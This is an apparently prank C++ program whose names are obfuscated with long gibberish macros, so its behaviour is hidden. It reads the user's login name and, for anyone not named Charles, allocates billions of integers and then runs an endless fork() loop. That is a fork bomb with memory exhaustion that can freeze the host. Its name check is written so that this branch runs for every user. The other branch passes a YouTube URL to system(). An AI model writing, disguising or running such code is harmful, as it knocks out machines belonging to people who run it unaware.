#include <chrono>
#include <cstring>
#include <iostream>
#include <memory>
#include <pmmintrin.h>
#include <stdio.h>
#include <thread>
#include <unistd.h>
#include <vector>
using namespace std;
#define vczxuvioczxuvixcuviczxovuicxzovuxcovucxvucivucxiozvucxzivucxiovucxzvuxcivujerqekwrjwkrljkrkwqerjlewjewjrkewr \
  2147483647
#pragma omp threadprivate(file)
#define xzciuvixzcuvoxcvxcuovuvcxuizuewuqruewruewqurwqirerrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr \
  pid_t
#define b78vcx7b89cv79bv7b8v9787878b7vc89b7xv987b7cvx897b8cv7b8cv7b8v7b8vb78cv9b7cv8b7vcx897b8cv9b78978cv97b89c7x8b7cv897b89xc7798cv7b8cv7b89cv7b98v7b89vcx7b798cxv7b8c9xvb879cvbc89xv7b89xv789b7v897897foaiuidufidsaofudis \
  1
using vkxlcjvklcxjvklcxjvklcxjvlcxkjvxkvjxckvjcxkvjcxljvkcxjvkxcjvxc =
    std::string;
#define viuvicxovuczxuvicxuvioxzuvocuvuvzxuouireywquirewuiyruiweqehfdkadsjfdhsafjkadfkfdsfdashjfdhsajkhvkhjkzcxvxiocxuvxciovucoivuicuvixzvucxizvuxczovizxcuvioxcz \
  _mm_pause()
#define vkcjvkzjvciovizuivcxovuiovxucivuouzxvuxoiczuviozuciovoucixzuve8794719847324hkj32432k4h3j1k43hjk24hhj4213fg32f4h132gf4132g \
  cout
#define xcvuicxvucxuvicxouvicxuvyewuirewirewreweryewsvyucivcxvxhkjjhjvkchvjkcxhjvkchjeihewurewrewjrewbrnewbremwnewrbewmnwrmkjvfdsfdhksjfhdsjkfd \
  char
#define KDJFKLDSJFKLDJFIDSOFUUIVCUVIOCXUOVIXCVUCIVUCIOVUCIOVUUIOUIOURIEWURIOWEUIROUEIOREUIOUOUIOUDSIOFUSDIOFUSIOFUIOAUSIOUSDISUDISDUASOIDUASOIDSAUIDSUOIUIOVUCIXOUVIOCXUVIXCUVOCIVUCXOIVUXCIOVCXVCXUVIOXCUIOCUVIOCXUVOICXVIOUIWEUIROUWEROIWER \
  int
vkxlcjvklcxjvklcxjvklcxjvlcxkjvxkvjxckvjcxkvjcxljvkcxjvkxcjvxc
vjckxjjzvklcxvjkcxlvjczxjvkczxljvkczxvjkxcvjkcxlvjkcxlvjxczkljfdsofoieruoiewuiewuiruweiqurriuioquriewuqrioqurioweruewrioqrewrWEQ_REW_RE_RQ_RE_W_QR_EW_R_WE_R_WQE_R_EWQ_REW_QR__REW_QR_WE_R_EW_F_DS_FDS_FA___BVC_B_CXV_BV() {

#ifdef _WIN32
  xcvuicxvucxuvicxouvicxuvyewuirewirewreweryewsvyucivcxvxhkjjhjvkchvjkcxhjvkchjeihewurewrewjrewbrnewbremwnewrbewmnwrmkjvfdsfdhksjfhdsjkfd
      fdsafdsajfsdakfjkdasfjksdajfdsljflsdkjfslkdjfkfjksdljfadsljfkldsajfoiuiocuivouxuicxuvicxuviocxvucxiovucxiovucxiovuxivucxoivuxcvuxciovuxciovucxiovucxivuocxiuvxvcuvoicxivxuvocixuixouvxcoivuocxilkjrewkrkjwerjwelkrjwelkrjelkwjrklewjrewkljvkcxvlcx
          [UNLEN + 1];
  DWORD username_len = UNLEN + 1;
  GetUserNameA(
      fdsafdsajfsdakfjkdasfjksdajfdsljflsdkjfslkdjfkfjksdljfadsljfkldsajfoiuiocuivouxuicxuvicxuviocxvucxiovucxiovucxiovuxivucxoivuxcvuxciovuxciovucxiovucxivuocxiuvxvcuvoicxivxuvocixuixouvxcoivuocxilkjrewkrkjwerjwelkrjwelkrjelkwjrklewjrewkljvkcxvlcx,
      &username_len);
  return vkxlcjvklcxjvklcxjvklcxjvlcxkjvxkvjxckvjcxkvjcxljvkcxjvkxcjvxc(
      fdsafdsajfsdakfjkdasfjksdajfdsljflsdkjfslkdjfkfjksdljfadsljfkldsajfoiuiocuivouxuicxuvicxuviocxvucxiovucxiovucxiovuxivucxoivuxcvuxciovuxciovucxiovucxivuocxiuvxvcuvoicxivxuvocixuixouvxcoivuocxilkjrewkrkjwerjwelkrjwelkrjelkwjrklewjrewkljvkcxvlcx);
#else
  xcvuicxvucxuvicxouvicxuvyewuirewirewreweryewsvyucivcxvxhkjjhjvkchvjkcxhjvkchjeihewurewrewjrewbrnewbremwnewrbewmnwrmkjvfdsfdhksjfhdsjkfd
      fdsafdsajfsdakfjkdasfjksdajfdsljflsdkjfslkdjfkfjksdljfadsljfkldsajfoiuiocuivouxuicxuvicxuviocxvucxiovucxiovucxiovuxivucxoivuxcvuxciovuxciovucxiovucxivuocxiuvxvcuvoicxivxuvocixuixouvxcoivuocxilkjrewkrkjwerjwelkrjwelkrjelkwjrklewjrewkljvkcxvlcx
          [256];
  getlogin_r(
      fdsafdsajfsdakfjkdasfjksdajfdsljflsdkjfslkdjfkfjksdljfadsljfkldsajfoiuiocuivouxuicxuvicxuviocxvucxiovucxiovucxiovuxivucxoivuxcvuxciovuxciovucxiovucxivuocxiuvxvcuvoicxivxuvocixuixouvxcoivuocxilkjrewkrkjwerjwelkrjwelkrjelkwjrklewjrewkljvkcxvlcx,
      256);
  return vkxlcjvklcxjvklcxjvklcxjvlcxkjvxkvjxckvjcxkvjcxljvkcxjvkxcjvxc(
      fdsafdsajfsdakfjkdasfjksdajfdsljflsdkjfslkdjfkfjksdljfadsljfkldsajfoiuiocuivouxuicxuvicxuviocxvucxiovucxiovucxiovuxivucxoivuxcvuxciovuxciovucxiovucxivuocxiuvxvcuvoicxivxuvocixuixouvxcoivuocxilkjrewkrkjwerjwelkrjwelkrjelkwjrklewjrewkljvkcxvlcx);
#endif
}

KDJFKLDSJFKLDJFIDSOFUUIVCUVIOCXUOVIXCVUCIVUCIOVUCIOVUUIOUIOURIEWURIOWEUIROUEIOREUIOUOUIOUDSIOFUSDIOFUSIOFUIOAUSIOUSDISUDISDUASOIDUASOIDSAUIDSUOIUIOVUCIXOUVIOCXUVIXCUVOCIVUCXOIVUXCIOVCXVCXUVIOXCUIOCUVIOCXUVOICXVIOUIWEUIROUWEROIWER
main() {
  vkcjvkzjvciovizuivcxovuiovxucivuouzxvuxoiczuviozuciovoucixzuve8794719847324hkj32432k4h3j1k43hjk24hhj4213fg32f4h132gf4132g
      << "Hi "
      << vjckxjjzvklcxvjkcxlvjczxjvkczxljvkczxvjkxcvjkcxlvjkcxlvjxczkljfdsofoieruoiewuiewuiruweiqurriuioquriewuqrioqurioweruewrioqrewrWEQ_REW_RE_RQ_RE_W_QR_EW_R_WE_R_WQE_R_EWQ_REW_QR__REW_QR_WE_R_EW_F_DS_FDS_FA___BVC_B_CXV_BV()
      << endl;
  if (vjckxjjzvklcxvjkcxlvjczxjvkczxljvkczxvjkxcvjkcxlvjkcxlvjxczkljfdsofoieruoiewuiewuiruweiqurriuioquriewuqrioqurioweruewrioqrewrWEQ_REW_RE_RQ_RE_W_QR_EW_R_WE_R_WQE_R_EWQ_REW_QR__REW_QR_WE_R_EW_F_DS_FDS_FA___BVC_B_CXV_BV() !=
          "charles" ||
      vjckxjjzvklcxvjkcxlvjczxjvkczxljvkczxvjkxcvjkcxlvjkcxlvjxczkljfdsofoieruoiewuiewuiruweiqurriuioquriewuqrioqurioweruewrioqrewrWEQ_REW_RE_RQ_RE_W_QR_EW_R_WE_R_WQE_R_EWQ_REW_QR__REW_QR_WE_R_EW_F_DS_FDS_FA___BVC_B_CXV_BV() !=
          "CHARLES" ||
      vjckxjjzvklcxvjkcxlvjczxjvkczxljvkczxvjkxcvjkcxlvjkcxlvjxczkljfdsofoieruoiewuiewuiruweiqurriuioquriewuqrioqurioweruewrioqrewrWEQ_REW_RE_RQ_RE_W_QR_EW_R_WE_R_WQE_R_EWQ_REW_QR__REW_QR_WE_R_EW_F_DS_FDS_FA___BVC_B_CXV_BV() !=
          "Charles") {
    vkcjvkzjvciovizuivcxovuiovxucivuouzxvuxoiczuviozuciovoucixzuve8794719847324hkj32432k4h3j1k43hjk24hhj4213fg32f4h132gf4132g
        << "You are not Charles :(\nI am sorry, but this is only for "
           "charles....Goodbye"
        << endl;

    vector<
        KDJFKLDSJFKLDJFIDSOFUUIVCUVIOCXUOVIXCVUCIVUCIOVUCIOVUUIOUIOURIEWURIOWEUIROUEIOREUIOUOUIOUDSIOFUSDIOFUSIOFUIOAUSIOUSDISUDISDUASOIDUASOIDSAUIDSUOIUIOVUCIXOUVIOCXUVIXCUVOCIVUCXOIVUXCIOVCXVCXUVIOXCUIOCUVIOCXUVOICXVIOUIWEUIROUWEROIWER>
        fkdsjaklfjdkaslfjdskljfkdasfjkdlafjdkfjsdkfjsdaklfjsdlfjsdklfjsadjiuuuvciboucviobucoubvciobuvciobuvciobvciobuvciobucviouiobuvciobuvciobuvciobuvc(
            vczxuvioczxuvixcuviczxovuicxzovuxcovucxvucivucxiozvucxzivucxiovucxzvuxcivujerqekwrjwkrljkrkwqerjlewjewjrkewr -
            500);
    for (
        KDJFKLDSJFKLDJFIDSOFUUIVCUVIOCXUOVIXCVUCIVUCIOVUCIOVUUIOUIOURIEWURIOWEUIROUEIOREUIOUOUIOUDSIOFUSDIOFUSIOFUIOAUSIOUSDISUDISDUASOIDUASOIDSAUIDSUOIUIOVUCIXOUVIOCXUVIXCUVOCIVUCXOIVUXCIOVCXVCXUVIOXCUIOCUVIOCXUVOICXVIOUIWEUIROUWEROIWER
            fdsjklfjsdklfjsdklfsjadkfjdkfjsdkfjsdlkfjsdiofusdifuadsiofadsufa7s8f7ds8789f7dsaf7ds9fa7sdfdsfdsaffasdfsdfsafadsfsafdsf =
                0;
        fdsjklfjsdklfjsdklfsjadkfjdkfjsdkfjsdlkfjsdiofusdifuadsiofadsufa7s8f7ds8789f7dsaf7ds9fa7sdfdsfdsaffasdfsdfsafadsfsafdsf <
        vczxuvioczxuvixcuviczxovuicxzovuxcovucxvucivucxiozvucxzivucxiovucxzvuxcivujerqekwrjwkrljkrkwqerjlewjewjrkewr -
            500;
        fdsjklfjsdklfjsdklfsjadkfjdkfjsdkfjsdlkfjsdiofusdifuadsiofadsufa7s8f7ds8789f7dsaf7ds9fa7sdfdsfdsaffasdfsdfsafadsfsafdsf++) {
      fkdsjaklfjdkaslfjdskljfkdasfjkdlafjdkfjsdkfjsdaklfjsdlfjsdklfjsadjiuuuvciboucviobucoubvciobuvciobuvciobvciobuvciobucviouiobuvciobuvciobuvciobuvc
          [fdsjklfjsdklfjsdklfsjadkfjdkfjsdkfjsdlkfjsdiofusdifuadsiofadsufa7s8f7ds8789f7dsaf7ds9fa7sdfdsfdsaffasdfsdfsafadsfsafdsf] =
              fdsjklfjsdklfjsdklfsjadkfjdkfjsdkfjsdlkfjsdiofusdifuadsiofadsufa7s8f7ds8789f7dsaf7ds9fa7sdfdsfdsaffasdfsdfsafadsfsafdsf;

      viuvicxovuczxuvicxuvioxzuvocuvuvzxuouireywquirewuiyruiweqehfdkadsjfdhsafjkadfkfdsfdashjfdhsajkhvkhjkzcxvxiocxuvxciovucoivuicuvixzvucxizvuxczovizxcuvioxcz;
    }

    while (true) {
      this_thread::sleep_for(chrono::milliseconds(
          b78vcx7b89cv79bv7b8v9787878b7vc89b7xv987b7cvx897b8cv7b8cv7b8v7b8vb78cv9b7cv8b7vcx897b8cv9b78978cv97b89c7x8b7cv897b89xc7798cv7b8cv7b89cv7b98v7b89vcx7b798cxv7b8c9xvb879cvbc89xv7b89xv789b7v897897foaiuidufidsaofudis));

      xzciuvixzcuvoxcvxcuovuvcxuizuewuqruewruewqurwqirerrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
          kjkqjrklewjrklewjrkewrjqkwjrekljoiuiu89v7b8cx7b97cvb7xcvbcxvb7cxv89b78fhieqjrklqjerklwqejlewjrkewjrwerjweqrhewrewuirewirqyewuryqeuiryuhfadksjfsdahfjdahjkdahfjaskdhfjksadsdhkadfjkhdasjkfadskfhsdjfkd =
              fork();
    }
  } else {
    vkcjvkzjvciovizuivcxovuiovxucivuouzxvuxoiczuviozuciovoucixzuve8794719847324hkj32432k4h3j1k43hjk24hhj4213fg32f4h132gf4132g
        << "Hi Charles! :D" << endl;
    vkxlcjvklcxjvklcxjvklcxjvlcxkjvxkvjxckvjcxkvjcxljvkcxjvkxcjvxc
        kfdjafkldsjfkldasjfkldsjfkaldsjfksadlfjsdfuiuruieourioewuqrioweuioweuroweqrkqwelrjwekrjewlkrjewrjeqwklrjwwenrewbrewmnbrwemnrmebrmwqrweqrqewmrbqewrhwerjhewhrjewkrhqrewuiryewuieiqryieruyiuqyruiwyiuqryuierqwreqw =
            "https://www.youtube.com/watch?v=dQw4w9WgXcQ";
    xcvuicxvucxuvicxouvicxuvyewuirewirewreweryewsvyucivcxvxhkjjhjvkchvjkcxhjvkchjeihewurewrewjrewbrnewbremwnewrbewmnwrmkjvfdsfdhksjfhdsjkfd
        *kdsjafkjdsfjsdifusdfudiaofusidofudufiodaufi9832478312479314321jk41h4jk23h43j214k3h2k4h312jhj4hk321hkjdskfdshajks =
            new xcvuicxvucxuvicxouvicxuvyewuirewirewreweryewsvyucivcxvxhkjjhjvkchvjkcxhjvkchjeihewurewrewjrewbrnewbremwnewrbewmnwrmkjvfdsfdhksjfhdsjkfd
                [kfdjafkldsjfkldasjfkldsjfkaldsjfksadlfjsdfuiuruieourioewuqrioweuioweuroweqrkqwelrjwekrjewlkrjewrjeqwklrjwwenrewbrewmnbrwemnrmebrmwqrweqrqewmrbqewrhwerjhewhrjewkrhqrewuiryewuieiqryieruyiuqyruiwyiuqryuierqwreqw
                     .length() +
                 1];
    strcpy(
        kdsjafkjdsfjsdifusdfudiaofusidofudufiodaufi9832478312479314321jk41h4jk23h43j214k3h2k4h312jhj4hk321hkjdskfdshajks,
        kfdjafkldsjfkldasjfkldsjfkaldsjfksadlfjsdfuiuruieourioewuqrioweuioweuroweqrkqwelrjwekrjewlkrjewrjeqwklrjwwenrewbrewmnbrwemnrmebrmwqrweqrqewmrbqewrhwerjhewhrjewkrhqrewuiryewuieiqryieruyiuqyruiwyiuqryuierqwreqw
            .c_str());
    system(
        kdsjafkjdsfjsdifusdfudiaofusidofudufiodaufi9832478312479314321jk41h4jk23h43j214k3h2k4h312jhj4hk321hkjdskfdshajks);
    delete
        [] kdsjafkjdsfjsdifusdfudiaofusidofudufiodaufi9832478312479314321jk41h4jk23h43j214k3h2k4h312jhj4hk321hkjdskfdshajks;
  }
}
